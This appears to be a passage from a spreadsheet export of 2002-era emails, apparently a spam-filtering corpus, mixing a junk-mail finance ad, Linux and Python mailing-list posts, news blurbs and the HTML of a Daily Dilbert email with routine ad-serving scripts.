 We can guarantee credit approval for merchant accounts.
 We provide cash even with bad or no credit to keep your business growing.
 We pay cash for uncollectables.
 Our investors specialize in collecting unpaid bills.
 Get a lump sum of cash for structured settlements or annuities.
 Cash in your lottery winnings... now.
 We purchase commercial and residential mortgages, we pay top dollar!
 We can purchase your life insurance policy for a lump sum of cash... now. 
 To learn more about our company and all our services,  please visit us at:
 http://www.tfund2000.com
 To be removed from our mailinf list send a blank email with the word remove in the subject line.
 Thank you and have a great day!
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 8 Sep 2002, CDale wrote:
 &gt; I agree w/ ya Tom.  That kind of thinking is SO idiotic.  Sure, gays
 So how many of your hetero friends had &gt;3 k lovers?
 &gt; are promiscuous, and so are hets, but I betcha gays are more
 &gt; AIDSphobic than hets, generally speaking....
 The virus load issue is orthogonal to the fact. Bzzt. Switch on your
 brain, you both. I was mentioning that a subpopulation outside of the sex
 industry is/used to be extremely promiscuous, about two orders of
 magnitude higher than average.
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "R" == R A Hettinga &lt;rah@shipwright.com&gt; writes:
     R&gt; "When I'm working on a problem, I never think about beauty. I
     R&gt; think only how to solve the problem. But when I have finished,
     R&gt; if the solution is not beautiful, I know it is wrong."  --
     R&gt; R. Buckminster Fuller
 "It was only /after/ I'd completed the geodesic dome that I noticed it
 was beautiful" --- R. Buckminster Fuller
 -- 
 Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
  - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
   "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Spambayes] spambayes package?
</t>
  </si>
  <si>
    <t xml:space="preserve">
     &gt;&gt; Before we get too far down this road, what do people think of
     &gt;&gt; creating a spambayes package containing classifier and tokenizer?
     &gt;&gt; This is just to minimize clutter in site-packages.
     Guido&gt; Too early IMO (if you mean to leave the various other tools out
     Guido&gt; of it).
 Well, I mentioned classifier and tokenize only because I thought they were
 the only importable modules.  The rest represent script-level code, right?
     Guido&gt; If and when we package this, perhaps we should use Barry's trick
     Guido&gt; from the email package for making the package itself the toplevel
     Guido&gt; dir of the distribution (rather than requiring an extra directory
     Guido&gt; level just so the package can be a subdir of the distro).
 That would be perfect.  I tried in the naive way last night, but wound up
 with all .py files in the package, which wasn't my intent.
 Skip
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Problem with an rpm...
</t>
  </si>
  <si>
    <t xml:space="preserve">Mark Derricutt wrote:
 &gt; Never mind, there was some cron thing doing rpm -qf ???  seems fine now.
 &gt; 
 &gt; --On Wednesday, February 06, 2002 07:37:44 +1300 Mark Derricutt 
 &gt; &lt;mark@talios.com&gt; wrote:
 &gt; 
 &gt;&gt; Fetched 88.1kB in 2m31s (581B/s)
 &gt;&gt; error: cannot get exclusive lock on /var/lib/rpm/Packages
 &gt;&gt; error: cannot open Packages index using db3 - Operation not permitted (1)
 &gt;&gt; E: could not open RPM database:cannot open Packages index using db3 -
 &gt;&gt; Operation not permitted (1)
 You can do a rpm --rebuilddb too
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: apt-get http fails
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --=-eAUUkMeF/tAqB1Bi49Ip
 Content-Type: text/plain
 Content-Transfer-Encoding: quoted-printable
 I installed apt-get yesterday and liked it, for a couple hours anyway.=20
 Late last night I started to get errors like:
 --( root@theshadows )-- apt-get update
 E: Method http has died unexpectedly!
 E: Tried to dequeue a fetching object
 E: Tried to dequeue a fetching object
 E: Tried to dequeue a fetching object
 E: Tried to dequeue a fetching object
 E: Tried to dequeue a fetching object
 E: Tried to dequeue a fetching object
 E: Tried to dequeue a fetching object
 (...)
 i get the same errors (two like the first line instead of one) with
 apt-get update.
 I was wondering why this would happen.
 I would appreciate any help you all can give me.
 Thanks.
 --=20
 					-Govind Salinas
 ICQ:32026672					AIM:DyErthScum
 --=-eAUUkMeF/tAqB1Bi49Ip
 Content-Type: application/pgp-signature; name=signature.asc
 Content-Description: This is a digitally signed message part
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: For info see http://www.gnupg.org
 iD8DBQA8YIlDhLd1P7Dk1P0RAhzSAKCUan9e5aIvrm2TVfcL0P+G4/ZkHQCgrv1l
 vpgf1Lp1ZZctS/jE4JiH4z4=
 =3dnC
 -----END PGP SIGNATURE-----
 --=-eAUUkMeF/tAqB1Bi49Ip--
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Instead of spreading BBC FUD, it's best to go straight to the horse's
 mouth: http://neo.jpl.nasa.gov/risk/2002nt7.html
 That said, if you do a comparison with the Google cache page, you'll
 see that the probability of impact has increased significantly given
 the last three days worth of observations.
 Hit or miss, Groundhog Day 2019 is going to be one heck of a show.
 Book early, avoid the rush.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
 Business Innovations Through Open Source Systems: http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Email list management howto
</t>
  </si>
  <si>
    <t xml:space="preserve">I think I'll ask this question again, as I sent on friday afternoon.  :-) 
 Justin 
 &gt; Hi,
 &gt; 
 &gt; Can anyone point me to a howto on running mailing lists. Not looking for
 &gt; anything that is  package specific, but rather something that 
 &gt; gives general
 &gt; info on the various Email headers and dealing with returned 
 &gt; mails, errors in
 &gt; transport etc..
 &gt; 
 &gt; Thanks
 &gt; 
 &gt; Justin
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: The absurdities of life.
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 At 3:25 PM -0400 on 10/8/02, Ned Jackson Lovely wrote:
 &gt; I've been waiting for Hettinga to regale us with one of his
 &gt; well-tuned micro-cash-bearer-settlement-geodesic-finance rants.
 &gt; Bob, you are SO  disappointing me.
 How about if I include it by reference...
 &lt;http://www.ibuc.com/pdfs/geoecon.pdf&gt;
 :-).
 Blue in the face,
 RAH
 -----BEGIN PGP SIGNATURE-----
 Version: PGP 7.5
 iQA/AwUBPaMxL8PxH8jf3ohaEQJOvwCgwLjDfcRLc/15ohgtx/Y7Vvrl/5IAn0iA
 eEFqCWCvykjwv+8jPA/PpDsf
 =vNcJ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</si>
  <si>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PFI hospital's 97m pay bill could cost NHS billions
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8418832,215/
 Date: 2002-10-01T04:33:52+01:00
 *Society:* Nurses and ancillary staff at a PFI hospital are set to win a legal 
 battle over equal pay that will cost the hospital 97m in back pay and add 13m 
 to its annual wage bill.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: A-level student sues for 100,000 over 'grade fixing'
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8622124,215/
 Date: 2002-10-07T03:52:52+01:00
 *Education:* A 19-year-old student becomes the first person to take legal 
 action over this year's A-level crisis.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] Server Partitioning
</t>
  </si>
  <si>
    <t xml:space="preserve">Partitioning is an ambiguous term
 but I think I know what you mean.
 Have you looked at: http://freevsd.org/
 Pdraig.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Gary Lawrence Murphy wrote:
 &gt; 
 &gt; Although it's like a total shock to 99.999% (5nines) of all the
 &gt; employed website designers out there, the truth is webforms /can/
 &gt; accept "U.S. of A" as a country.  Incredible, but true.  Web forms can
 &gt; also accept /multiple/ or even /free-form/ telephone numbers and can
 &gt; even be partitioned into manageable steps. All this can also be done
 &gt; without selling exclusive rights to your wallet to the World's
 &gt; Second-Richest Corporation (assuming Cisco is still #1) and vendor
 &gt; locking your business into their "small transaction fee" tithe.
 Ah, but you've just gotten to the crux of the
 situation.  There's good design and bad design. 
 There's good testing and bad testing.  The problem
 is, anyone can design a good Web form, but nobody
 does.  I think "best practices" hasn't caught up
 on main street Web enablement yet.  There's some
 really great packages on how to do this stuff and
 in fact the usability people knew that Web forms needed
 to be fixed 5 years ago, so that's why we got XForms
 and  XHTML.  You can shoot yourself in the foot and
 people usually do.  What the problem is, they don't
 even recognize that they're gimpy--ever.  They just
 keeping trundling along making a mess of everything
 assured in their job security that they can build
 Web forms without even caring if they can be
 used or not beyond their test machine.
 If you had a piece of software and a security warning
 came out 5 years ago on it, would you run that software?
 Wouldn't you have patched or upgraded something so fundamentally
 broken 4 years and 11 months ago?  What I want to know
 is why would someone use Web forms best practices from
 5 years ago?  I mean you can get a college degree in that
 time.  Imagine if the next version of Microsoft Windows
 or Red Hat Linux forced you to use a tiled window
 manager?  Sure, tiled windows were the best we had for
 a brief period of time, but they are completely useless
 except for some terminal based replacement applications. 
 The bottom line is, if you can't get across the
 bridge, then it's broken regardless of whose fault
 it really is, and it's the business that 
 needs to take responsibility as they are the ones that
 wanted to put the bridge there in the first place. 
 Greg
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your Daily Dilbert 07/18/2002
</t>
  </si>
  <si>
    <t xml:space="preserve">--16675500.1026989382816.JavaMail.root.umsan1
 Content-Type: text/plain; charset=ISO-8859-1
 Content-Transfer-Encoding: 7bit
 E-mail error
 You're subscribed to the HTML version of the Daily Dilbert,
 which shows the comic strip as a graphic, but your mail system
 either can't support HTML or is set up to remove HTML content. For
 more information, contact your Internet service provider or mail
 system administrator.
 To change to a plain text subscription, modify your account
 preferences at 
 http://www.dilbert.com/comics/dilbert/daily_dilbert/html/login.html
 The plain text option appears toward the bottom of the modification
 page.
 --16675500.1026989382816.JavaMail.root.umsan1
 Content-Type: text/html; charset=ISO-8859-1
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;Daily Dilbert&lt;/TITLE&gt;
 &lt;meta http-equiv=3D"pragma" content=3D"no-cache"&gt;
 &lt;META HTTP-EQUIV=3D"expires" CONTENT=3D"0"&gt;
 &lt;meta http-equiv=3D"Cache-control" content=3D"no-cache"&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR=3D"#336699" text=3D"#000000" link=3D"#000000" vlink=3D"#00339=
 9" alink=3D"#3333CC" MARGINWIDTH=3D"0" MARGINHEIGHT=3D"8" LEFTMARGIN=3D"0" =
 TOPMARGIN=3D"8"&gt;
 &lt;TABLE WIDTH=3D"100%" BORDER=3D"0" CELLPADDING=3D"0" BGCOLOR=3D"#336699"&gt;
 &lt;TR&gt;
 &lt;TD BGCOLOR=3D"#336699" WIDTH=3D"15"&gt;&lt;IMG SRC=3D"http://www.comics.com/comi=
 cs/dilbert/images/clear_dot.gif" WIDTH=3D"15" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 &lt;TD BGCOLOR=3D"#336699"&gt;
 &lt;SCRIPT LANGUAGE=3D"JAVASCRIPT"&gt;
 &lt;!--=20
 function rand(n)=20
 {
 seed =3D (0x015a4e35 * seed) % 0xfffffff;
 return (seed &gt;&gt; 16) % n;
 }
 var now =3D new Date ();
 var seed =3D now.getTime() % 0xffffffff;
 var same =3D rand(1000);
 // End hiding script from old browsers --&gt;
 &lt;/SCRIPT&gt;
 &lt;SCRIPT Language=3D"JavaScript"&gt;
 &lt;!-- hide from old browsers
   var today =3D new Date()
 //--&gt;
 &lt;/SCRIPT&gt;
 &lt;!-- CONTENT AND SKYSCRAPER AD TABLE BEGIN --&gt;
 &lt;TABLE CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D"0"&gt;
 =09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09&lt;TD BGCOLOR=3D"#336699"&gt;
 =09=09=09&lt;!-- AD TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"468" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/small_ad.gif" WIDTH=3D"20" HEIGHT=3D"11" =
 BORDER=3D"0" ALT=3D"Advertisement"&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/co=
 mics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"1" BORDER=3D"0" AL=
 T=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"21" BGCOLOR=3D"#336699" ROWSPAN=3D"2"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"21"=
  HEIGHT=3D"72" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"120" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/small_ad.gif" WIDTH=3D"20" HEIGHT=3D"11" =
 BORDER=3D"0" ALT=3D"Advertisement"&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/co=
 mics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"1" BORDER=3D"0" AL=
 T=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"18" BGCOLOR=3D"#336699" ROWSPAN=3D"2"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"18"=
  HEIGHT=3D"72" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"468" BGCOLOR=3D"#336699"&gt;
 =09=09=09=09=09&lt;!-- BEGIN ENHANCED CREATIVE --&gt;
 =09=09=09=09=09&lt;SCRIPT LANGUAGE=3D"JavaScript"&gt;
 =09=09=09=09=09&lt;!--
 =09=09=09=09=09document.write ('&lt;TABLE WIDTH=3D"468" CELLSPACING=3D"0" CELL=
 PADDING=3D"0" BORDER=3D"0"&gt;&lt;TR VALIGN=3D"TOP"&gt;&lt;TD ALIGN=3D"LEFT"&gt;&lt;ILAYER ID=
 =3Dph1 VISIBILITY=3Dhidden width=3D"468" height=3D"60"&gt;&lt;/ILAYER&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;=
 /TABLE&gt;');
 =09=09=09=09=09document.write ('&lt;NOLAYER&gt;');
 =09=09=09=09=09document.write ('&lt;IFRAME SRC=3D"http://ad.doubleclick.net/ad=
 i/dilbert.email.com/email/;sz=3D468x60;ptile=3D1;ord=3D' + same + '?" name=
 =3D"frame1" width=3D"468" height=3D"60" frameborder=3D"no" border=3D"0" MAR=
 GINWIDTH=3D"0" MARGINHEIGHT=3D"0" SCROLLING=3D"no"&gt;');
 =09=09=09=09=09document.write ('&lt;A target=3D"_blank" HREF=3D"http://ummail4=
 .unitedmedia.com:80/Click?q=3D87-izOOQ8n9PmYW-hneperijJtfZdRR"&gt;');
 =09=09=09=09=09document.write ('&lt;IMG SRC=3D"http://ad.doubleclick.net/ad/di=
 lbert.email.com/email/;abr=3D!ie;sz=3D468x60;ptile=3D1;ord=3D' + same + '?"=
  border=3D"0" WIDTH=3D"468" HEIGHT=3D"60"&gt;&lt;/A&gt;&lt;/IFRAME&gt;');
 =09=09=09=09=09document.write ('&lt;/NOLAYER&gt;');=20
 =09=09=09=09=09//--&gt;
 =09=09=09=09=09&lt;/SCRIPT&gt;
 =09=09=09=09=09&lt;NOSCRIPT&gt;
 =09=09=09=09=09&lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:=
 80/Click?q=3D9c-xtCpQanwk_rwlomlXRIatIRbBsRR"&gt;&lt;IMG SRC=3D"http://ad.doublec=
 lick.net/ad/dilbert.email.com/email/;abr=3D!ie;sz=3D468x60;ptile=3D1;ord=3D=
 1986839?" BORDER=3D"0" WIDTH=3D"468" HEIGHT=3D"60"&gt;&lt;/a&gt;
 =09=09=09=09=09&lt;/NOSCRIPT&gt;
 =09=09=09=09=09&lt;!-- END ENHANCED CREATIVE --&gt;&lt;/TD&gt;
 =09=09=09=09=09
 =09=09=09=09=09
 =09=09=09=09=09
 =09=09=09=09=09&lt;TD WIDTH=3D"120" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"1" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.united=
 media.com:80/Click?q=3Db1-YzzzJQ-00z-47PJhr9n_ylHMYP9RR"&gt;&lt;IMG SRC=3D"http://=
 www.comics.com/comics/dilbert/daily_dilbert/images/dilbert_tshirt_120x60.gi=
 f" WIDTH=3D"120" HEIGHT=3D"60" BORDER=3D"0" ALT=3D"Shop Dilbert"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"627" HEIGHT=3D"10" COLSPAN=3D"4"&gt;&lt;IMG SRC=3D"ht=
 tp://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"627" HEIG=
 HT=3D"10" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- AD TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- HEADER TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"515" BGCOLOR=3D"#336699" ROWSPAN=3D"3"&gt;&lt;A targe=
 t=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Dc6-URl9QML=
 zgZ9vu7LWdh_IeLuxu9RR"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/dai=
 ly_dilbert/images/daily_dilbert_header_left.gif" WIDTH=3D"515" HEIGHT=3D"76=
 " BORDER=3D"0" ALT=3D"Daily Dilbert"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"90" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/daily_dilbert/images/daily_dilbert_header_mid_top=
 .gif" WIDTH=3D"90" HEIGHT=3D"55" BORDER=3D"0" ALT=3D"Daily Dilbert"&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"5" BGCOLOR=3D"#336699" ROWSPAN=3D"3"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/daily_dilbert/images/daily_dilbert=
 _header_right.gif" WIDTH=3D"5" HEIGHT=3D"76" BORDER=3D"0" ALT=3D"Daily Dilb=
 ert"&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"17" ROWSPAN=3D"3"&gt;&lt;IMG SRC=3D"http://www.comics=
 .com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"17" HEIGHT=3D"10" BORDER=
 =3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09
 =09=09=09=09&lt;!-- ENTER DATE HERE --&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"90" BGCOLOR=3D"#003366" HEIGHT=3D"13"&gt;&lt;FONT FAC=
 E=3D"helvetica, arial" SIZE=3D"1" COLOR=3D"#FFFFFF"&gt;&lt;B&gt;07/18/2002&lt;/B&gt;&lt;/FONT=
 &gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"90" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/daily_dilbert/images/daily_dilbert_header_mid_bot=
 tom.gif" WIDTH=3D"90" HEIGHT=3D"8" BORDER=3D"0" ALT=3D"Daily Dilbert"&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- HEADER TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- WHITE LINE AND GREETING TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"2" BGCOLOR=3D"#003366"&gt;&lt;IMG SRC=3D=
 "http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEI=
 GHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"605" HEIGHT=3D"2" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"605" HEIGHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"2" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D=
 "http://www.comics.com/comics/dilbert/daily_dilbert/images/white_line_right=
 .gif" WIDTH=3D"4" HEIGHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"17" HEIGHT=3D"48" ROWSPAN=3D"4"&gt;&lt;IMG SRC=3D"htt=
 p://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"17" HEIGHT=
 =3D"48" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"37" BGCOLOR=3D"#003366" ROWSPAN=3D=
 "2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"1" HEIGHT=3D"39" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"605" HEIGHT=3D"5" BGCOLOR=3D"#FFCC66" COLSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"605" HEIGHT=3D"7" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"37" BACKGROUND=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/ffcc66_right.gif" ROWSPAN=3D"2"&gt;&lt;=
 IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=
 =3D"4" HEIGHT=3D"39" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" HEIGHT=3D"32" BGCOLOR=3D"#FFCC66"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"10"=
  HEIGHT=3D"32" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"595" HEIGHT=3D"32" BGCOLOR=3D"#FFCC66"&gt;&lt;FONT FA=
 CE=3D"Arial,Verdana" SIZE=3D"1"&gt;Hi Justin, enjoy your daily comic from &lt;A t=
 arget=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Ddb-rm7=
 9QJEz6LjfsBzvp1t9spLcVdRR"&gt;Dilbert.com&lt;/A&gt;.&lt;BR&gt;&lt;B&gt;If you like the Daily Dil=
 bert, tell a friend! &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedi=
 a.com:80/Click?q=3Df0-nvTDQWgtK4OBqFl2fIf5OwrimdRR"&gt;Click here to send mail=
 &lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"1" BGCOLOR=3D"#003366"&gt;&lt;IMG SRC=3D"http://www.c=
 omics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"7" BOR=
 DER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"605" BGCOLOR=3D"#FFFFFF" COLSPAN=3D"2"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"605=
 " HEIGHT=3D"7" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"7" BACKGROUND=3D"http://www.comics=
 .com/comics/dilbert/daily_dilbert/images/ffffff_right.gif"&gt;&lt;IMG SRC=3D"http=
 ://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"4" BORDER=
 =3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- WHITE LINE AND GREETING TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- ONLINE STORE AND STRIP TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"348" BGCOLOR=3D"#003366" ROWSPAN=
 =3D"6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"1" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"348" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"4" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"6" HEIGHT=3D"83" BGCOLOR=3D"#FFFFFF" ROWSPAN=3D=
 "5"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"6" HEIGHT=3D"83" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"585" HEIGHT=3D"19" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"7"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily_dilbert/image=
 s/header_online_store.gif" WIDTH=3D"200" HEIGHT=3D"15" BORDER=3D"0" ALT=3D"=
 "&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif=
 " WIDTH=3D"4" HEIGHT=3D"4" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"9" HEIGHT=3D"83" BGCOLOR=3D"#FFFFFF" ROWSPAN=3D=
 "5"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"9" HEIGHT=3D"83" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"348" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"1" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
